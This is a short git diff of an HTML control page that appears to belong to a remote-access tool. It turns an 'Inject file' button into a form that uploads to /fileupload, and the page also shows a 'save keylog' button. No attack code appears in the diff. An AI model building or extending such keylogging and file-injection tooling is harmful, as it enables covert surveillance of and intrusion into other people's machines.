--- a/host-Server/index.html
+++ b/host-Server/index.html
@@ -34,8 +34,11 @@
         <div id="back_a_dir" title="go back a directory"></div>
         <div id="dirbox"></div>
         <div class="btn_wrapper">
-            <input type="file" class="video_btn" name="Select file to inject" id="file_selector">
-            <button id="inject_file" class="video_btn">Inject file</button>
+
+            <form action="/fileupload" method="post" enctype="multipart/form-data" id="form1">
+                <input type="file" class="video_btn" name="Select file to inject" id="file_selector">
+                <input type="submit" class="video_btn" form="form1" value="Inject file" style=""></input>
+            </form>
             <button id="refresh_file" class="video_btn">Refresh</button>
         </div>
     </div>
@@ -48,7 +51,7 @@
             <button id="save_log" class="video_btn" title="save keylog to text file">save keylog</button>
         </div>
     </div>
-    
+
     <script src="https://unpkg.com/peerjs@1.3.1/dist/peerjs.min.js"></script>
     <script type="text/javascript" src="res/js/index.js"></script>
 </body>
